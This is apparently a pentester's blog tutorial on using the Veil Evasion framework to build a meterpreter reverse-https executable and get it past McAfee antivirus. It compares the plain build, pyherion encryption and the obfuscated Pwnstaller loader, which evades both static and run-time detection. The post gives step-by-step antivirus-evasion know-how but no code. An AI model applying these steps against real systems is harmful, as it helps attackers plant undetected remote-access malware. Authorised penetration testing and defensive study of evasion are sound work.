Veil Evasion

This was a post I have been intending to write for several months now, however a fellow hacker recently asked me for advice on this topic. So I decided why not share.

Anti-Virus can be a real pain to a pentester. However like everything else in the computer security world, for every defensive measure, there is a more impressive hack. In steps the Veil Framework. Veil as a whole is a very awesome framework, but for our purposes, we will focus on one component, called Veil Evasion. This tool is developed solely with the purpose of bypassing your favorite AV software. I will pick on McAfee, but make no mistake, this is not a flaw in McAfee. This will work on most AVs.

Veil can be installed from the github link above. If you are using Kali, it is very simple, just run the setup.sh script and you shouldn't have any major issues. Veil provides a very simple to use command line interface. From the first screen, you can use the "list" command to see the payloads that Veil offers. Currently there are 33 payloads to choose from.

Most of my experience has been utilizing payloads 17 and 24. For this discussion I will be using 24. I have found the need for an executable greater than any other type during my testing. From this screen you can type "use 24" to select the python meterpreter reverse https payload. Depending on your use case, it is worth noting this is not a staged payload. The following screen will have a metasploit feel to it and is just as simple to use. Use "set" to configure your LHOST and LPORT options. Since we want to create an exe, we will leave the "compile_to_exe" option to "Y". If you change this to "no" it will produce python scripts. Useful for some use cases. Also take note at the "use_pyherion" option. This option will encrypt your payload. For the first run, lets try this left as "N". We will come back to this later. The following screens wants you to name the payload. Once you do, you will be presented with 3 other options on how to compile the payload, as shown below.

These options are very important. In alot of cases the first option will work very well, hence the default. Lets try option 1 with McAfee. Once you make your selection, Veil will compile your payload. Your payload will be dropped in your home directory under a "veil-output" folder. You will also notice it creates a metasploit resource file, which is really nice for making sure you setup the correct handler for you payload. With AV there is two types of testing which needs to be bypassed, static and run time. I have a Windows 7 64 bit VM configured with the latest version of McAfee Enterprise. To test static detection I will drop the binary on the system, and tell McAfee to scan the file.

Before I can even, tell McAfee to scan the file, my payload is detected and deleted. Epic Fail. McAfee was even aware that Veil was used to create this payload. Don't worry not all hope is lost. Remember the two other options I made note of? First is pyherion, which will encrypt your payload. If you rebuild your binary with this option, you will be pleased to know you will be able to staticly scan your payload without detection. Victory! right!? Don't forget, the second test. Even though your payload will pass static detection in this case, as soon as you run it McAfee will throw a fit, and remove it. Great, McAfee 2 - Redbutt 0. Lets look at the other compile option, labeled "Pwnstaller (obfuscated Pyinstaller loader)" or option 2. This option will also obfuscate the run time loader used to run your payload. Let's see how McAfee likes this option. Static test?

Sweet, first test passed! Now lets try and run it.

No alarms! Did we get a meterpreter session?

Success! What is even better about this option, is you do not need to use pyherion as well. This compile option will take care of both static and run time detection IN THIS INSTANCE. It is important to note that this does not mean it will work for every version of AV. Each AV should be tested independently. You can also add your Veil payload to Metasploit using the "set EXE::Custom \path\to\veil.exe" option. Thats Veil Evasion in a nut shell with a basic scenario. Feel free to comment or message me with questions or other experiences.